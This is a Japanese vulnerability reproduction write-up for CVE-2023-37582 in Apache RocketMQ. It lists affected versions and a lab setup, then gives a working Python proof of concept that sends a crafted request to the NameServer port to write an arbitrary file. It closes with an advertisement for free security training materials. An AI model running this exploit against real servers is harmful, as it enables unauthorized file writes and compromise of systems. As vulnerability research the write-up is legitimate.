Apache RocketMQ リモートコード実行の脆弱性 (CVE-2023-37582)

脆弱性プロファイル

Apache RocketMQ は、低遅延、高同時実行性、高可用性、高信頼性を備えた分散メッセージミドルウェアです。CVE-2023-37582 では、CVE-2023-33246 の不完全な修復により、Apache RocketMQ NameServer への不正アクセスがあると、攻撃者は RocketMQ を実行しているシステムユーザーとしてコマンドを実行する悪意のあるリクエストを作成する可能性があります。

影響を受けるバージョン

Apache RocketMQ <= 5.1.1
Apache RocketMQ <= 4.9.6

環境構築

「Apache RocketMQ リモートコード実行の脆弱性 CVE-2023-33246 環境設定」を参照してください。

デバッグの利便性を考慮して、RocketMQ 関連サービスを Linux 上で構築し、ソースコードを使用して開始します。

合計 2 つのサービスを実行する必要があります

org.apache.rocketmq.namesrv.NamesrvStartup
org.apache.rocketmq.broker.BrokerStartup

最初に NamesrvStartup を開始し、次に BrokerStartup を開始します。環境変数 ROCKETMQ_HOME ROCKETMQ_HOME=/home/ubuntu/Desktop/rocketmq-rocketmq-all-5.1.0 を構成する必要があります。

脆弱性の再発

Pythonスクリプトを実行する

import socket
import binascii
client = socket.socket()

# you ip
client.connect(('192.168.222.130',9876))

# data
json = '{"code":318,"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
body='configStorePath=/tmp/test.txt\nproductEnvName=123\\ntest'.encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2) # 一个字节是2个十六进制数
head1 = '00000000'+str(hex(json_lens))[2:]      # hex(xxxx) 0x1243434 去掉 0x
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')

# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)

指定された文字列 test が tmp ディレクトリの下の test.txt ファイルに正常に書き込まれます。

サイバーセキュリティの学習に役立ち、完全な情報セットの S レターを無料で入手できます:
① サイバーセキュリティ学習の成長パスのマインドマップ
② 60 以上の古典的なサイバーセキュリティツールキット
③ 100 以上の SRC 分析レポート
④ サイバーセキュリティの攻撃と防御の戦闘テクニックに関する 150 以上の電子書籍
⑤最も権威のある CISSP 認定試験ガイド + クエスチョンバンク
⑥ 1800 ページを超える CTF 実践スキルマニュアル
⑦ ネットワークセキュリティ企業からの最新の面接質問集 (回答を含む)
⑧ APP クライアントセキュリティテストガイド (Android+IOS)